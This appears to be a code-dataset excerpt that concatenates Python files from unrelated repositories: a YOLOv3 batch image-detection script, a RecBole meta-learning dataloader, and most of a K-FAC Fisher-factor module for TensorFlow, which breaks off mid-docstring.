If this can run, everything is OK. os.system("rm -rf save") print("pickle path deleted") ```
{ "source": "2017ND/k-yolov3", "score": 3 }
#### File: 2017ND/k-yolov3/detect_all.py ```python import os from yolo import YOLO from PIL import Image def detect_img(yolo): pic_temp = [] pic = os.listdir(test_dir) for name in pic: pic_temp.append(name) for i in range(len(pic_temp)): img = test_dir + '/' + pic_temp[i] image = Image.open(img) detect = yolo.detect_image(image) # detect.show() detect.save(target_dir + '/' + pic_temp[i]) yolo.close_session() return detect if __name__ == '__main__': test_dir = './test_img' target_dir = './detect_results' if not os.path.exists(target_dir): os.mkdir(target_dir) detect_img(YOLO()) ```
{ "source": "2017pxy/Multimodal-Meta-Learning-for-Cold-Start-Sequential-Recommendation", "score": 3 }
#### File: data/dataloader/meta_learning_dataloader.py ```python from collections import OrderedDict import numpy as np import torch from recbole.data.interaction import Interaction from recbole.data.dataloader.abstract_dataloader import AbstractDataLoader class MetaLearningDataLoader(AbstractDataLoader): def __init__(self, config, dataset, meta_learning_dataloaders, shuffle=True): self.meta_learning_dataloaders = meta_learning_dataloaders self.task_name = list(meta_learning_dataloaders.keys()) super(MetaLearningDataLoader, self).__init__(config, dataset, None, shuffle) def _init_batch_size_and_step(self): batch_size = self.config['train_batch_size'] self.step = batch_size self.set_batch_size(batch_size) @property def pr_end(self): return len(self.task_name) def _shuffle(self): """Shuffle the order of data, and it will be called by :meth:`__iter__` if self.shuffle is True. """ np.random.shuffle(self.task_name) def _next_batch_data(self): """Assemble next batch of data in form of Interaction, and return these data. Returns: Interaction: The next batch of data. """ tasks = self.task_name[self.pr:self.pr+self.step] self.pr += self.step result = OrderedDict() for task in tasks: result[task] = self.meta_learning_dataloaders[task] return result ```
{ "source": "2018233031/kfac", "score": 2 }
#### File: python/ops/fisher_factors.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import contextlib import math # Dependency imports import numpy as np import six import tensorflow as tf from collections import OrderedDict from tensorflow.python.util import nest from kfac.python.ops import linear_operator as lo from tensorflow.python.training import moving_averages from kfac.python.ops import utils # Whether to initialize covariance estimators at a zero matrix (or the identity # matrix). INIT_COVARIANCES_AT_ZERO = True # Whether to zero-debias the moving averages. ZERO_DEBIAS = True # Whether to initialize inverse (and other such matrices computed from the cov # matrices) to the zero matrix (or the identity matrix). Initializing to # zero is a safeguard against anything using the inverse before their first # proper update, and so is preferred. INIT_INVERSES_AT_ZERO = True # When the number of inverses requested from a FisherFactor exceeds this value, # the inverses are computed using an eigenvalue decomposition. EIGENVALUE_DECOMPOSITION_THRESHOLD = 2 # Numerical eigenvalues computed from covariance matrix estimates are clipped to # be at least as large as this value before they are used to compute inverses or # matrix powers. Must be nonnegative. EIGENVALUE_CLIPPING_THRESHOLD = 0.0 # When approximating conv layer input factor using spatially uncorrelated # activations (`ConvInputSUAKroneckerfactor`) if this is True then assumes the # activations to have zero mean. ASSUME_ZERO_MEAN_ACTIVATIONS = False # When approximating conv layer input factor using spatially uncorrelated # activations (`ConvInputSUAKroneckerfactor`) if this is True then do # mean subtraction from covariance matrix. Note this flag is only checked in the # case where ASSUME_ZERO_MEAN_ACTIVATIONS is set to True. If # ASSUME_ZERO_MEAN_ACTIVATIONS is False then mean is always subtracted from the # covaraince matrix and this flag is redundant. SUBTRACT_MEAN_CONTRIB_FROM_COV = True # Subsample the inputs passed to the extract image patches. The number of # inputs is normally batch_size. If _SUB_SAMPLE_INPUTS = True then # the inputs will be randomly subsampled down to a total of # _INPUTS_TO_EXTRACT_PATCHES_FACTOR * batch_size. # # Note that the value of _SUB_SAMPLE_INPUTS can be overridden locally for a # particular layer by passing in an argument to the factor class (or the # registration function for the corresponding layer). _SUB_SAMPLE_INPUTS = False _INPUTS_TO_EXTRACT_PATCHES_FACTOR = 0.2 # Subsample the extracted image patches during covariance estimation for # input factors in conv layer. The number of patches subsampled will be # calculated based on the following formula: # # if _SUB_SAMPLE_PATCHES: # num_patches = min(_MAX_NUM_PATCHES, # ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension)) # else # num_patches = total_patches # # where dimension is the number of rows (or columns) of the input factor matrix, # which is typically the number of input channels times the number of pixels # in a patch. # # Note that the value of _SUB_SAMPLE_PATCHES can be overridden locally for a # particular layer by passing in an argument to the factor class (or the # registration function for the corresponding layer). _SUB_SAMPLE_PATCHES = False _MAX_NUM_PATCHES = 10000000 _MAX_NUM_PATCHES_PER_DIMENSION = 3.0 # TOWER_STRATEGY can be one of "concat" or "separate". If "concat", the data # passed to the factors from the blocks will be concatenated across towers # (lazily via PartitionedTensor objects). Otherwise a tuple of tensors over # towers will be passed in, and the factors will iterate over this and do the # cov computations separately for each one, averaging the results together. TOWER_STRATEGY = "separate" #TOWER_STRATEGY = "concat" # The variable scope names can be edited by passing a custom sanitizer function. # By default the scope name is unchanged. _GET_SANITIZED_NAME_FN = lambda x: x def set_global_constants(init_covariances_at_zero=None, zero_debias=None, init_inverses_at_zero=None, eigenvalue_decomposition_threshold=None, eigenvalue_clipping_threshold=None, assume_zero_mean_activations=None, subtract_mean_contrib_from_cov=None, sub_sample_inputs=None, inputs_to_extract_patches_factor=None, sub_sample_patches=None, max_num_patches=None, max_num_patches_per_dimension=None, tower_strategy=None, get_sanitized_name_fn=None): """Sets various global constants used by the classes in this module.""" global INIT_COVARIANCES_AT_ZERO global ZERO_DEBIAS global INIT_INVERSES_AT_ZERO global EIGENVALUE_DECOMPOSITION_THRESHOLD global EIGENVALUE_CLIPPING_THRESHOLD global ASSUME_ZERO_MEAN_ACTIVATIONS global SUBTRACT_MEAN_CONTRIB_FROM_COV global _SUB_SAMPLE_INPUTS global _INPUTS_TO_EXTRACT_PATCHES_FACTOR global _SUB_SAMPLE_PATCHES global _MAX_NUM_PATCHES global _MAX_NUM_PATCHES_PER_DIMENSION global _GET_SANITIZED_NAME_FN global TOWER_STRATEGY if init_covariances_at_zero is not None: INIT_COVARIANCES_AT_ZERO = init_covariances_at_zero if zero_debias is not None: ZERO_DEBIAS = zero_debias if init_inverses_at_zero is not None: INIT_INVERSES_AT_ZERO = init_inverses_at_zero if eigenvalue_decomposition_threshold is not None: EIGENVALUE_DECOMPOSITION_THRESHOLD = eigenvalue_decomposition_threshold if eigenvalue_clipping_threshold is not None: EIGENVALUE_CLIPPING_THRESHOLD = eigenvalue_clipping_threshold if assume_zero_mean_activations is not None: ASSUME_ZERO_MEAN_ACTIVATIONS = assume_zero_mean_activations if subtract_mean_contrib_from_cov is not None: SUBTRACT_MEAN_CONTRIB_FROM_COV = subtract_mean_contrib_from_cov if sub_sample_inputs is not None: _SUB_SAMPLE_INPUTS = sub_sample_inputs if inputs_to_extract_patches_factor is not None: _INPUTS_TO_EXTRACT_PATCHES_FACTOR = inputs_to_extract_patches_factor if sub_sample_patches is not None: _SUB_SAMPLE_PATCHES = sub_sample_patches if max_num_patches is not None: _MAX_NUM_PATCHES = max_num_patches if max_num_patches_per_dimension is not None: _MAX_NUM_PATCHES_PER_DIMENSION = max_num_patches_per_dimension if tower_strategy is not None: TOWER_STRATEGY = tower_strategy if get_sanitized_name_fn is not None: _GET_SANITIZED_NAME_FN = get_sanitized_name_fn def inverse_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument if INIT_INVERSES_AT_ZERO: return tf.zeros(shape, dtype=dtype) return tf.eye(num_rows=shape[0], dtype=dtype) def covariance_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument if INIT_COVARIANCES_AT_ZERO: return tf.zeros(shape, dtype=dtype) return tf.eye(num_rows=shape[0], dtype=dtype) def diagonal_covariance_initializer(shape, dtype, partition_info=None): # pylint: disable=unused-argument if INIT_COVARIANCES_AT_ZERO: return tf.zeros(shape, dtype=dtype) return tf.ones(shape, dtype=dtype) @contextlib.contextmanager def maybe_place_on_device(device): if device is not None and len(device) and TOWER_STRATEGY == "separate": with tf.device(device): yield else: yield def compute_cov(tensor, tensor_right=None, normalizer=None): """Compute the empirical second moment of the rows of a 2D Tensor. This function is meant to be applied to random matrices for which the true row mean is zero, so that the true second moment equals the true covariance. Args: tensor: A 2D Tensor. tensor_right: An optional 2D Tensor. If provided, this function computes the matrix product tensor^T * tensor_right instead of tensor^T * tensor. normalizer: optional scalar for the estimator (by default, the normalizer is the number of rows of tensor). Returns: A square 2D Tensor with as many rows/cols as the number of input columns. """ if normalizer is None: normalizer = utils.get_shape(tensor)[0] if tensor_right is None: cov = ( tf.matmul(tensor, tensor, transpose_a=True) / tf.cast( normalizer, tensor.dtype)) return (cov + tf.transpose(cov)) / tf.cast(2.0, cov.dtype) else: return (tf.matmul(tensor, tensor_right, transpose_a=True) / tf.cast(normalizer, tensor.dtype)) def append_homog(tensor, homog_value=None): """Appends a homogeneous coordinate to the last dimension of a Tensor. Args: tensor: A Tensor. homog_value: Value to append as homogeneous coordinate to the last dimension of `tensor`. If None 1.0 is used. (Default: None) Returns: A Tensor identical to the input but one larger in the last dimension. The new entries are filled with ones. """ shape = tensor.shape.as_list() rank = len(shape) if any(elt is None for elt in shape): shape = tf.concat([tf.shape(tensor)[:-1], [1]], axis=0) else: shape[-1] = 1 if homog_value is not None: appendage = homog_value * tf.ones(shape, dtype=tensor.dtype) else: appendage = tf.ones(shape, dtype=tensor.dtype) return tf.concat([tensor, appendage], axis=-1) def accumulate_and_maybe_write(acc_var, var, tensor, ema_decay, weight, should_write): def write(): return tf.group( var.add_to_average(acc_var.read_value_and_reset(), decay=ema_decay, weight=weight)) with tf.control_dependencies([acc_var.accumulate(tensor)]): if isinstance(should_write, bool): if should_write: return write() else: return tf.no_op() else: return tf.cond(should_write, write, tf.no_op) def scope_string_from_params(params): """Builds a variable scope string name from the given parameters. Supported parameters are: * tensors * booleans * ints * strings * depth-1 tuples/lists of ints * any depth tuples/lists of tensors Other parameter types will throw an error. Args: params: A parameter or list of parameters. Returns: A string to use for the variable scope. Raises: ValueError: if params includes an unsupported type. """ params = params if isinstance(params, (tuple, list)) else (params,) name_parts = [] for param in params: if param is None: name_parts.append("None") elif isinstance(param, (tuple, list)): if all([isinstance(p, int) for p in param]): name_parts.append("-".join([str(p) for p in param])) else: name_parts.append(scope_string_from_name(param)) elif isinstance(param, (six.string_types, int, bool)): name_parts.append(str(param)) elif isinstance(param, (tf.Tensor, tf.Variable)): name_parts.append(scope_string_from_name(param)) elif isinstance(param, utils.PartitionedTensor): name_parts.append(scope_string_from_name(param.tensors)) else: raise ValueError("Encountered an unsupported param {} of type {}".format( param, type(param))) return "_".join(name_parts) def scope_string_from_name(tensor): if isinstance(tensor, (tuple, list)): return "__".join([scope_string_from_name(t) for t in tensor]) # "gradients/add_4_grad/Reshape:0/replica_0" -> # "gradients_add_4_grad_Reshape_0_replica_0" tensor_name = tensor.name.replace("/", "_").replace(":", "_") return _GET_SANITIZED_NAME_FN(tensor_name) def scalar_or_tensor_to_string(val): return repr(val) if np.isscalar(val) else scope_string_from_name(val) def list_to_string(lst): return "_".join(val if isinstance(val, six.string_types) else scalar_or_tensor_to_string(val) for val in lst) def graph_func_to_id(func): """Returns a hashable object that represents func's computation.""" # TODO(b/74201126): replace with Topohash of func's output return func.func_id def graph_func_to_string(func): # TODO(b/74201126): replace with Topohash of func's output return list_to_string(func.func_id) def _subsample_patches(patches, name=None): """Subsample a patches matrix. Subsample an array of image patches. The number of patches subsampled will be calculated based on the following formula: num_patches = min(_MAX_NUM_PATCHES, ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension)) Args: patches: Tensor, of shape `[total_patches, dimension]`. name: `string`, Default (None) Returns: A tensor of shape `[num_patches, dimension]`. Raises: ValueError: If patches is not matrix-shaped. ValueError: If total_patches cannot be inferred. """ with tf.name_scope(name, "subsample", [patches]): patches = tf.convert_to_tensor(patches) if len(patches.shape) != 2: raise ValueError("Input param patches must be a matrix.") total_patches = patches.shape.as_list()[0] dimension = patches.shape.as_list()[1] num_patches = min(_MAX_NUM_PATCHES, int(math.ceil(_MAX_NUM_PATCHES_PER_DIMENSION*dimension))) if total_patches is None: total_patches = utils.get_shape(patches)[0] should_subsample = tf.less(num_patches, total_patches) return tf.cond(should_subsample, lambda: _random_tensor_gather(patches, num_patches, name), lambda: patches) else: if num_patches < total_patches: return _random_tensor_gather(patches, num_patches, name) else: return patches def _random_tensor_gather(array, num_ind, name=None): """Samples random indices of an array (along the first dimension). Args: array: Tensor of shape `[batch_size, ...]`. num_ind: int. Number of indices to sample. name: `string`. (Default: None) Returns: A tensor of shape `[num_ind, ...]`. """ with tf.name_scope(name, "random_gather", [array]): array = tf.convert_to_tensor(array) total_size = array.shape.as_list()[0] if total_size is None: total_size = utils.get_shape(array)[0] indices = tf.random_shuffle(tf.range(0, total_size))[:num_ind] return tf.gather(array, indices, axis=0) @six.add_metaclass(abc.ABCMeta) class FisherFactor(object): """Base class for objects modeling factors of approximate Fisher blocks. A FisherFactor represents part of an approximate Fisher Information matrix. For example, one approximation to the Fisher uses the Kronecker product of two FisherFactors A and B, F = kron(A, B). FisherFactors are composed with FisherBlocks to construct a block-diagonal approximation to the full Fisher. FisherFactors are backed by a single, non-trainable variable that is updated by running FisherFactor.make_covariance_update_op(). The shape and type of this variable is implementation specific. Note that for blocks that aren't based on approximations, a 'factor' can be the entire block itself, as is the case for the diagonal and full representations. """ def __init__(self): self._cov_tensor = None self._cov = None self._acc_cov = None @abc.abstractproperty def _var_scope(self): """Variable scope for this FisherFactor instance. Returns: string that unique identifies this FisherFactor instance. """ pass @property def name(self): return self._var_scope @abc.abstractproperty def _cov_shape(self): """The shape of the variable backing this FisherFactor.""" pass @abc.abstractproperty def _num_sources(self): """The number of things to sum over when updating covariance variable. The default make_covariance_update_op function will call _compute_new_cov with indices ranging from 0 to _num_sources-1. The typical situation is where the factor wants to sum the statistics it computes over multiple backpropped "gradients" (typically passed in via "tensors" or "outputs_grads" arguments). """ pass @abc.abstractproperty def _num_towers(self): pass @abc.abstractproperty def _dtype(self): """dtype for variable backing this factor.""" pass @abc.abstractmethod def _partial_batch_size(self, source=0, tower=0): """Returns (partial) batch size associated with given source and tower.""" pass def batch_size(self, source=0): """Returns (total) batch size associated with given source.""" return sum(self._partial_batch_size(source=source, tower=tower) for tower in range(self._num_towers)) def check_partial_batch_sizes(self): """Ensures partial batch sizes are equal across towers and source.""" # While it could be okay in principle for the different batch sizes for # different towers, the way the code has been written isn't compatible with # this. Basically, the normalizations occur for each tower and then the # results are summed across towers and divided by the number of towers. # The only way this is correct is if the towers all have the same batch # size. # Should make these messages use quote characters instead of parentheses # when the bug with quote character rendering in assertion messages is # fixed. See b/129476712 msg = ("Inconsistent (partial) batch sizes detected for factor ({}) of type" " {}. This can be caused by passing Tensors with the wrong sizes to " "the registration functions, or misspecification of arguments like " "batch_size, num_uses, or num_timesteps.".format( self.name, utils.cls_name(self))) partial_batch_size = self._partial_batch_size() if self._num_sources > 1 or self._num_towers > 1: if isinstance(partial_batch_size, int): checks = tuple( partial_batch_size == self._partial_batch_size(source=source, tower=tower) for source, tower in zip(range(self._num_sources), range(self._num_towers))) if not all(checks): raise ValueError(msg) return tf.no_op() else: asserts = tuple( tf.assert_equal(partial_batch_size, self._partial_batch_size(source=source, tower=tower), message=msg) for source, tower in zip(range(self._num_sources), range(self._num_towers))) return tf.group(asserts) return tf.no_op() @property def _cov_initializer(self): """Function for initializing covariance variable.""" return covariance_initializer def instantiate_cov_variables(self): """Makes the internal cov variable(s).""" assert self._cov is None with tf.variable_scope(self._var_scope): self._cov = utils.MovingAverageVariable( name="cov", shape=self._cov_shape, dtype=self._dtype, initializer=self._cov_initializer, normalize_value=ZERO_DEBIAS) self._acc_cov = utils.AccumulatorVariable( name="acc_cov", shape=self._cov_shape, dtype=self._dtype) @abc.abstractmethod def _compute_new_cov(self, source, tower): """Computes minibatch-estimated covariance for a single source. Args: source: int in [0, self._num_sources). Which source to use when computing the cov update. tower: int in [0, self._num_towers). Which tower to use when computing the cov update. Returns: Tensor of same shape as self.cov. """ pass def _compute_total_new_cov(self): """Computes covariance by summing across (source, towers).""" new_cov_contribs = [] for source in range(self._num_sources): for tower in range(self._num_towers): with maybe_place_on_device(self._get_data_device(tower)): new_cov_contribs.append(self._compute_new_cov(source, tower)) new_cov = tf.add_n(new_cov_contribs) / float(self._num_towers) # Compute average of 'new_cov' across all replicas. On a replica, each # instance of 'new_cov' will be based on a different minibatch. This ensures # that by the end of assign_moving_average(), all replicas see the same # value for self._cov. # # Other implementations of make_covariance_update_op() that accumulate # statistics in other variables should mimic this behavior. # # NOTE: communicating this matrix at every iteration is wasteful in the # sense that we might only need fresh copies when we do the inversions. # (Although be careful about factors [e.g. diagonal] or ops # [e.g. multiply()] that directly use the cov vars instead of the inv vars!) new_cov = utils.all_average(new_cov) return new_cov def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True): """Constructs and returns the covariance update Op. Args: ema_decay: float or Tensor. The exponential moving average decay. ema_weight: float or Tensor. The weight to put on the newly computed values. This is typically 1.0 - ema_decay. should_write: Python or TF bool. If True, we write the covariance to the variable and reset the accumulator instead of just accumulating. (Default: True) Returns: The op which updates the cov variable (via acc_cov). """ cov_tensor = self._compute_total_new_cov() self._cov_tensor = cov_tensor # This is used for non-standard applications # and debugging I think. return accumulate_and_maybe_write(self._acc_cov, self._cov, cov_tensor, ema_decay, ema_weight, should_write) @abc.abstractmethod def _get_data_device(self, tower): pass @abc.abstractmethod def instantiate_inv_variables(self): """Makes the internal "inverse" variable(s).""" pass @abc.abstractmethod def make_inverse_update_ops(self): """Create and return update ops corresponding to registered computations.""" pass @property def cov(self): return self._cov.value def get_cov_vars(self): return [self.cov] def get_inv_vars(self): return [] @abc.abstractmethod def get_cov_as_linear_operator(self): """Returns `LinearOperator` instance which wraps the cov matrix.""" pass @abc.abstractmethod def register_matpower(self, exp, damping_func): pass @abc.abstractmethod def register_cholesky(self, damping_func): pass @abc.abstractmethod def register_cholesky_inverse(self, damping_func): pass @abc.abstractmethod def get_matpower(self, exp, damping_func): pass @abc.abstractmethod def get_cholesky(self, damping_func): pass @abc.abstractmethod def get_cholesky_inverse(self, damping_func): pass class DenseSquareMatrixFactor(FisherFactor): """Base class for FisherFactors that are stored as dense square matrices. This class explicitly calculates and stores inverses of their `cov` matrices, which must be square dense matrices. Subclasses must implement the _compute_new_cov method, and the _var_scope and _cov_shape properties. """ # TODO(b/69108481): This class (and its subclasses) should be refactored to # serve the matrix quantities it computes as both (potentially stale) # variables, updated by the inverse update ops, and fresh values stored in # tensors that recomputed once every session.run() call. Currently matpower # and damp_inverse have the former behavior, while eigendecomposition has # the latter. def __init__(self): self._matpower_by_exp_and_damping = OrderedDict() # { (float, hashable): variable } self._matpower_registrations = set() # { (float, hashable) } self._eigendecomp = None self._damping_funcs_by_id = OrderedDict() # {hashable: lambda} self._cholesky_registrations = set() # { hashable } self._cholesky_inverse_registrations = set() # { hashable } self._cholesky_by_damping = OrderedDict() # { hashable: variable } self._cholesky_inverse_by_damping = OrderedDict() # { hashable: variable } super(DenseSquareMatrixFactor, self).__init__() def get_cov_as_linear_operator(self): """Returns `LinearOperator` instance which wraps the cov matrix.""" assert self.cov.shape.ndims == 2 return lo.LinearOperatorFullMatrix(self.cov, is_self_adjoint=True, is_square=True) def _register_damping(self, damping_func): damping_id = graph_func_to_id(damping_func) if damping_id not in self._damping_funcs_by_id: self._damping_funcs_by_id[damping_id] = damping_func return damping_id def register_inverse(self, damping_func): # Just for backwards compatibility of some old code and tests self.register_matpower(-1, damping_func) def register_matpower(self, exp, damping_func): """Registers a matrix power to be maintained and served on demand. This creates a variable and signals make_inverse_update_ops to make the corresponding update op. The variable can be read via the method get_matpower. Args: exp: float. The exponent to use in the matrix power. damping_func: A function that computes a 0-D Tensor or a float which will be the damping value used. i.e. damping = damping_func(). """ if exp == 1.0: return damping_id = self._register_damping(damping_func) if (exp, damping_id) not in self._matpower_registrations: self._matpower_registrations.add((exp, damping_id)) def register_cholesky(self, damping_func): """Registers a Cholesky factor to be maintained and served on demand. This creates a variable and signals make_inverse_update_ops to make the corresponding update op. The variable can be read via the method get_cholesky. Args: damping_func: A function that computes a 0-D Tensor or a float which will be the damping value used. i.e. damping = damping_func(). """ damping_id = self._register_damping(damping_func) if damping_id not in self._cholesky_registrations: self._cholesky_registrations.add(damping_id) def register_cholesky_inverse(self, damping_func): """Registers an inverse Cholesky factor to be maintained/served on demand. This creates a variable and signals make_inverse_update_ops to make the corresponding update op. The variable can be read via the method get_cholesky_inverse. Args: damping_func: A function that computes a 0-D Tensor or a float which will be the damping value used. i.e. damping = damping_func(). """ damping_id = self._register_damping(damping_func) if damping_id not in self._cholesky_inverse_registrations: self._cholesky_inverse_registrations.add(damping_id) def get_inv_vars(self): inv_vars = [] inv_vars.extend(self._matpower_by_exp_and_damping.values()) inv_vars.extend(self._cholesky_by_damping.values()) inv_vars.extend(self._cholesky_inverse_by_damping.values()) return inv_vars def instantiate_inv_variables(self): """Makes the internal "inverse" variable(s).""" for (exp, damping_id) in self._matpower_registrations: exp_string = scalar_or_tensor_to_string(exp) damping_func = self._damping_funcs_by_id[damping_id] damping_string = graph_func_to_string(damping_func) with tf.variable_scope(self._var_scope): matpower = tf.get_variable( "matpower_exp{}_damp{}".format(exp_string, damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) assert (exp, damping_id) not in self._matpower_by_exp_and_damping self._matpower_by_exp_and_damping[(exp, damping_id)] = matpower for damping_id in self._cholesky_registrations: damping_func = self._damping_funcs_by_id[damping_id] damping_string = graph_func_to_string(damping_func) with tf.variable_scope(self._var_scope): chol = tf.get_variable( "cholesky_damp{}".format(damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) assert damping_id not in self._cholesky_by_damping self._cholesky_by_damping[damping_id] = chol for damping_id in self._cholesky_inverse_registrations: damping_func = self._damping_funcs_by_id[damping_id] damping_string = graph_func_to_string(damping_func) with tf.variable_scope(self._var_scope): cholinv = tf.get_variable( "cholesky_inverse_damp{}".format(damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) assert damping_id not in self._cholesky_inverse_by_damping self._cholesky_inverse_by_damping[damping_id] = cholinv def make_inverse_update_ops(self): """Create and return update ops corresponding to registered computations.""" ops = [] num_inverses = sum(1 for (exp, _) in self._matpower_by_exp_and_damping if exp == -1) num_other_matpower = len(self._matpower_by_exp_and_damping) - num_inverses other_matrix_power_registered = num_other_matpower >= 1 use_eig = ( self._eigendecomp or other_matrix_power_registered or num_inverses >= EIGENVALUE_DECOMPOSITION_THRESHOLD) # We precompute these so we don't need to evaluate them multiple times (for # each matrix power that uses them) damping_value_by_id = {damping_id: tf.cast( self._damping_funcs_by_id[damping_id](), self._dtype) for damping_id in self._damping_funcs_by_id} if use_eig: eigenvalues, eigenvectors = self.get_eigendecomp() # pylint: disable=unpacking-non-sequence for (exp, damping_id), matpower in ( self._matpower_by_exp_and_damping.items()): damping = damping_value_by_id[damping_id] ops.append( utils.smart_assign( matpower, tf.matmul(eigenvectors * (eigenvalues + damping)**exp, tf.transpose(eigenvectors)))) # These ops share computation and should be run on a single device. ops = [tf.group(*ops)] else: for (exp, damping_id), matpower in ( self._matpower_by_exp_and_damping.items()): assert exp == -1 damping = damping_value_by_id[damping_id] ops.append( utils.smart_assign(matpower, utils.posdef_inv(self.cov, damping))) # TODO(b/77902055): If inverses are being computed with Cholesky's # we can share the work. Instead this code currently just computes the # Cholesky a second time. It does at least share work between requests for # Cholesky's and Cholesky inverses with the same damping id. for damping_id, cholesky_inv in self._cholesky_inverse_by_damping.items(): cholesky_ops = [] damping = damping_value_by_id[damping_id] cholesky_value = utils.cholesky(self.cov, damping) if damping_id in self._cholesky_by_damping: cholesky = self._cholesky_by_damping[damping_id] cholesky_ops.append(utils.smart_assign(cholesky, cholesky_value)) identity = tf.eye( cholesky_value.shape.as_list()[0], dtype=cholesky_value.dtype) cholesky_inv_value = tf.matrix_triangular_solve(cholesky_value, identity) cholesky_ops.append(utils.smart_assign(cholesky_inv, cholesky_inv_value)) ops.append(tf.group(*cholesky_ops)) for damping_id, cholesky in self._cholesky_by_damping.items(): if damping_id not in self._cholesky_inverse_by_damping: damping = damping_value_by_id[damping_id] cholesky_value = utils.cholesky(self.cov, damping) ops.append(utils.smart_assign(cholesky, cholesky_value)) self._eigendecomp = False return ops def get_inverse(self, damping_func): # Just for backwards compatibility of some old code and tests return self.get_matpower(-1, damping_func) def get_matpower(self, exp, damping_func): # Note that this function returns a variable which gets updated by the # inverse ops. It may be stale / inconsistent with the latest value of # self.cov (except when exp == 1). if exp != 1: damping_id = graph_func_to_id(damping_func) matpower = self._matpower_by_exp_and_damping[(exp, damping_id)] else: cov = self.cov identity = tf.eye(cov.shape.as_list()[0], dtype=cov.dtype) matpower = cov + tf.cast(damping_func(), dtype=self.cov.dtype)*identity assert matpower.shape.ndims == 2 return lo.LinearOperatorFullMatrix(matpower, is_non_singular=True, is_self_adjoint=True, is_positive_definite=True, is_square=True) def get_cholesky(self, damping_func): # Note that this function returns a variable which gets updated by the # inverse ops. It may be stale / inconsistent with the latest value of # self.cov. damping_id = graph_func_to_id(damping_func) cholesky = self._cholesky_by_damping[damping_id] assert cholesky.shape.ndims == 2 return lo.LinearOperatorFullMatrix(cholesky, is_non_singular=True, is_square=True) def get_cholesky_inverse(self, damping_func): # Note that this function returns a variable which gets updated by the # inverse ops. It may be stale / inconsistent with the latest value of # self.cov. damping_id = graph_func_to_id(damping_func) cholesky_inv = self._cholesky_inverse_by_damping[damping_id] assert cholesky_inv.shape.ndims == 2 return lo.LinearOperatorFullMatrix(cholesky_inv, is_non_singular=True, is_square=True) def get_eigendecomp(self): """Creates or retrieves eigendecomposition of self._cov.""" # Unlike get_matpower this doesn't retrieve a stored variable, but instead # always computes a fresh version from the current value of self.cov. if not self._eigendecomp: eigenvalues, eigenvectors = tf.self_adjoint_eig(self.cov) # The matrix self._cov is positive semidefinite by construction, but the # numerical eigenvalues could be negative due to numerical errors, so here # we clip them to be at least FLAGS.eigenvalue_clipping_threshold clipped_eigenvalues = tf.maximum(eigenvalues, EIGENVALUE_CLIPPING_THRESHOLD) self._eigendecomp = (clipped_eigenvalues, eigenvectors) return self._eigendecomp class NaiveFullFactor(DenseSquareMatrixFactor): """FisherFactor for a full matrix representation of the Fisher of a parameter. Note that this uses the naive "square the sum estimator", and so is applicable to any type of parameter in principle, but has very high variance. """ def __init__(self, params_grads, batch_size): self._batch_size = batch_size self._params_grads = tuple(utils.ensure_sequence(params_grad) for params_grad in params_grads) super(NaiveFullFactor, self).__init__() @property def _var_scope(self): return "ff_naivefull_" + scope_string_from_params( [self._params_grads, self._batch_size]) @property def _cov_shape(self): size = sum(param_grad.shape.num_elements() for param_grad in self._params_grads[0]) return (size, size) @property def _num_sources(self): return len(self._params_grads) @property def _num_towers(self): return 1 @property def _dtype(self): return self._params_grads[0][0].dtype def _partial_batch_size(self, source=0, tower=0): assert source == 0 and tower == 0 return self._batch_size def _compute_new_cov(self, source, tower): assert tower == 0 # This will be a very basic rank 1 estimate params_grads_flat = utils.tensors_to_column(self._params_grads[source]) return ((params_grads_flat * tf.transpose(params_grads_flat)) / tf.cast( self._batch_size, params_grads_flat.dtype)) def _get_data_device(self, tower): return None @six.add_metaclass(abc.ABCMeta) class DiagonalFactor(FisherFactor): """A base class for FisherFactors that use diagonal approximations. A DiagonalFactor's covariance variable can be of any shape, but must contain exactly one entry per parameter. """ def get_cov_as_linear_operator(self): """Returns `LinearOperator` instance which wraps the cov matrix.""" return lo.LinearOperatorDiag(self._matrix_diagonal, is_self_adjoint=True, is_square=True) @property def _cov_initializer(self): return diagonal_covariance_initializer @property def _matrix_diagonal(self): return tf.reshape(self.cov, [-1]) def make_inverse_update_ops(self): return [] def instantiate_inv_variables(self): pass def register_matpower(self, exp, damping_func): pass def register_cholesky(self, damping_func): pass def register_cholesky_inverse(self, damping_func): pass def get_matpower(self, exp, damping_func): matpower_diagonal = (self._matrix_diagonal + tf.cast(damping_func(), self._dtype))**exp return lo.LinearOperatorDiag(matpower_diagonal, is_non_singular=True, is_self_adjoint=True, is_positive_definite=True, is_square=True) def get_cholesky(self, damping_func): return self.get_matpower(0.5, damping_func) def get_cholesky_inverse(self, damping_func): return self.get_matpower(-0.5, damping_func) class NaiveDiagonalFactor(DiagonalFactor): """FisherFactor for a diagonal approximation of any type of param's Fisher. Note that this uses the naive "square the sum estimator", and so is applicable to any type of parameter in principle, but has very high variance. """ def __init__(self, params_grads, batch_size): """Initializes NaiveDiagonalFactor instance. Args: params_grads: Sequence of Tensors, each with same shape as parameters this FisherFactor corresponds to. For example, the gradient of the loss with respect to parameters. batch_size: int or 0-D Tensor. Size """ self._params_grads = tuple(utils.ensure_sequence(params_grad) for params_grad in params_grads) self._batch_size = batch_size super(NaiveDiagonalFactor, self).__init__() @property def _var_scope(self): return "ff_naivediag_" + scope_string_from_params( [self._params_grads, self._batch_size]) @property def _cov_shape(self): size = sum(param_grad.shape.num_elements() for param_grad in self._params_grads[0]) return [size, 1] @property def _num_sources(self): return len(self._params_grads) @property def _num_towers(self): return 1 @property def _dtype(self): return self._params_grads[0][0].dtype def _partial_batch_size(self, source=0, tower=0): assert source == 0 and tower == 0 return self._batch_size def _compute_new_cov(self, source, tower): assert tower == 0 params_grads_flat = utils.tensors_to_column(self._params_grads[source]) return (tf.square(params_grads_flat) / tf.cast( self._batch_size, params_grads_flat.dtype)) def _get_data_device(self, tower): return None class DiagonalKroneckerFactor(DiagonalFactor): """A Kronecker FisherFactor using diagonal approximations. This class handles both sparse and dense inputs. The covariance is estimated using the diagonal covariance matrix. For a dense tensor: Cov(inputs, inputs) = (1/batch_size) 